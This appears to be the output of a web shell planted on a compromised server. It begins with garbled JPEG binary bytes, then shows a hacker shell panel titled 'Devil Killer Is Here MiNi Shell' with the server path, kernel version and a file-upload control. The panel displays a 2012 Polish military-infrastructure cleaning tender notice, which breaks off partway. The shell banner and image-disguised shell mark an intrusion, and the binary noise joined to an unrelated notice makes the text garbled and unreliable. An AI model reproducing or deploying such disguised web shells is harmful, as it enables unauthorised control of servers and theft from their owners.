JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120307/70248-N-2012.html

<p class="kh_header"><b>Wrocław: ŚWIADCZENIE USŁUG W ZAKRESIE KOMPLEKSOWEGO UTRZYMANIA CZYSTOŚCI (XI Części)</b><br>
<b>Numer ogłoszenia: 70248 - 2012; data zamieszczenia: 07.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE KOMPLEKSOWEGO UTRZYMANIA CZYSTOŚCI (XI Części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG W ZAKRESIE KOMPLEKSOWEGO UTRZYMANIA CZYSTOŚCI (XI Części):
Część I - Kompleks WKU w Brzegu ul. Chrobrego 7;  
Część II - Kompleks Kompania Medyczna bud. 35 w Brzegu ul. Sikorskiego 6;
Część III - Kompleks GKO w Brzegu ul. Piastowska 4;
Część IV - Kompleks Wspólna Kwatera Stała bud. 36 w Brzegu ul. Sikorskiego 6;
Część V - Kompleks Parafia Wojskowa bud nr 3 w Kłodzku ul. Walecznych 59;
Część VI - Kompleksy Punkt Kontroli Technicznej, Magazyn Materiałów Pędnych i Smarów, Myjnia w Kłodzku ul. Walecznych 59;
Cześć VII - Kompleksy OSPG Jodła ul. Świerczewskiego w Dusznikach Zdrój, Zieleniec bud. nr 1 Wyciąg Narciarski;
Część VIII - Kompleksy w Opolu ul. Domańskiego 68 bud. nr 14 oraz ul. Niemodlińska 88 bud. nr 2 - klauzula ZASTRZEŻONE;
Część IX - Kompleks w Bolesławcu ul. Wojska Polskiego 54;
Część X - Kompleks Jastrzębie Ambulatorium bud. nr 3;
Część XI - Kompleks WKU bud. nr 1 w Kędzierzyn- Koźle ul. Łukasiewicza 11..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 77.34.20.00-9, 77.34.20.00-9, 77.31.41.00-5, 90.63.00.00-2, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium na niżej podane części w wysokości:
część VI- 4 229,00 zł
część VII- 3 317,00 zł
część IX- 3 737,00 zł
Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego do dnia 15.03.2012r. do godz. 10.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dostraczyć wykaz osób, które posiadają aktualne upoważnienie wydane przez kierownika jednostki organizacyjnej, lub poświadczenie bezpieczeństwa osobowego o klauzuli minimum ZASTRZEŻONE oraz zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych; ww. dokumenty dotyczą personelu sprzątającego wykonującego obowiązki służbowe (dot. Wykonawców, którzy składają ofertę przetargową na część: VIII) - Formularz Nr 5.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. informacje ogólne o Wykonawcy - Formularz nr 1, 1a ( dotyczy tylko osób fizycznych), 2. oświadczenie o spełnieniu warunków udziału w postępowaniu - Formularz Nr 2, 3. propozycje ewentualnego podzlecenia elementów usług - Formularz Nr 3,4. arkusz kalkulacyjny</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 
1) ustalonej kwoty umowy w przypadku zmniejszenia lub zwiększenia powierzchni ujętych w arkuszu kalkulacyjnym;
2) ustalonej kwoty umowy w przypadku zmiany powszechnie obowiązujących przepisów prawa, a w szczególności przepisów prawa podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław, pok. 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław- kancelaria pok. 101..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie WKU w Brzegu ul. Chrobrego 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej)
podanej w tabeli nr 1:
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych,sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych:
W zależności od warunków atmosferycznych: Czyszczenie i zamiatanie dróg, chodników, placów oraz chodników przyległych do terenu (w tym czyszczenie poboczy przy krawężnikach z zanieczyszczeń, chwastów i śmieci), wywóz zebranych podczas sprzątania odpadów - 5 razy w tygodniu lub: Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
Pielęgnacja trawników , rabatów kwiatowych, żywopłotów (koszenie, grabienie, pielenie chwastów, wywóz odpadów zebranych podczas pielęgnacji* itp. ) (po 1 raz w miesiącu: maj, czerwiec, lipiec, sierpień, wrzesień) podlewanie - wg. potrzeb. Grabienie liści, wywóz odpadów zebranych podczas grabienia (po 2 razy w miesiącu: październik, listopad)
4. Odśnieżanie dachów płaskich:
Odśnieżanie, dachów płaskich -w przypadku wystąpienia opadów śniegu, na zgłoszenie Kierownika WAK. (od listopada do grudnia)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.34.20.00-9, 77.31.41.00-5, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie Kompania Medyczna bud. 35 w Brzegu ul. Sikorskiego 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej)
podanej w tabeli nr 1:
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych,sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych:
W zależności od warunków atmosferycznych: Czyszczenie i zamiatanie dróg, chodników, placów oraz chodników przyległych do terenu (w tym czyszczenie poboczy przy krawężnikach z zanieczyszczeń, chwastów i śmieci), wywóz zebranych podczas sprzątania odpadów lub: Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
Pielęgnacja krzewów ozdobnych, żywopłotów (cięcie wg określonej formy, nawożenie, wywóz odpadów zebranych podczas pielęgnacji* itp.), Pielęgnacja trawników , rabatów kwiatowych, żywopłotów (koszenie, grabienie, pielenie chwastów, wywóz odpadów zebranych podczas pielęgnacji itp. ), podlewanie - wg. potrzeb. Grabienie liści, wywóz odpadów zebranych podczas grabienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.34.20.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie GKO w Brzegu ul. Piastowska 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej)
podanej w tabeli nr 1:
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych,sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych:
W zależności od warunków atmosferycznych: Czyszczenie i zamiatanie dróg, chodników, placów oraz chodników przyległych do terenu (w tym czyszczenie poboczy przy krawężnikach z zanieczyszczeń, chwastów i śmieci), wywóz zebranych podczas sprzątania odpadów lub: Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
Pielęgnacja krzewów ozdobnych, ,żywopłotów(cięcie wg określonej formy, nawożenie, wywóz odpadów zebranych podczas pielęgnacji* itp.). Pielęgnacja trawników , rabatów kwiatowych, żywopłotów (koszenie, grabienie, pielenie chwastów, wywóz odpadów zebranych podczas pielęgnacji itp. ) podlewanie - wg. potrzeb. Grabienie liści, wywóz odpadów zebranych podczas grabienia.
4.Odśnieżanie terenowych obiektów utwardzonych i dachów płaskich:
Odśnieżanie, dachów płaskich- w przypadku wystąpienia opadów śniegu, na zgłoszenie Kierownika WAK..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 77.34.20.00-9, 77.31.41.00-5, 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie Wspólna Kwatera Stała bud. 36 w Brzegu ul. Sikorskiego 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych: 
W zależości od warunków atmosferycznych: Czyszczenie i zamiatanie dróg,chodników, placów oraz chdoników pzyległych do terenu (w tym czyszczenie oboczy przy krawężnikach zanieczyszczeń, chwastów  śmieci), wywóz zebranych odczas sprzątania dpadów lub:Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
Pielęgnacja krzewów ozdobnych, żywopłotów (cięcie wg określonej formy, nawożenie, wywóz odpadów zebranych podczas pielęgnacji itp.).
Pielęgnacja trawników , rabatów kwiatowych, żywopłotów (koszenie, grabienie, pielenie chwastów, wywóz odpadów zebranych podczas pielęgnacji*itp. ) podlewanie - wg. potrzeb. Grabienie liści, wywóz odpadów zebranych podczas grabienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.34.20.00-9, 77.31.41.00-5, 77.31.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie Parafia Wojskowa bud nr 3 w Kłodzku ul. Walecznych 59.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej)
podanej w tabeli nr 1:
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie Punkt Kontroli Technicznej, Magazyn Materiałów Pędnych i Smarów, Myjnia w Kłodzku ul. Walecznych 59.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej)
podanej w tabeli nr 1:
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie OSPG Jodła ul. Świerczewskiego w Dusznikach Zdrój, Zieleniec         bud. nr 1 Wyciąg Narciarski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych: W zależności od warunków atmosferycznych:
Czyszczenie i zamiatanie dróg, chodników, placów oraz chodników przyległych do
terenu (w tym czyszczenie poboczy przy krawężnikach z zanieczyszczeń, chwastów i śmieci), wywóz zebranych podczas sprzątania odpadów lub: Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
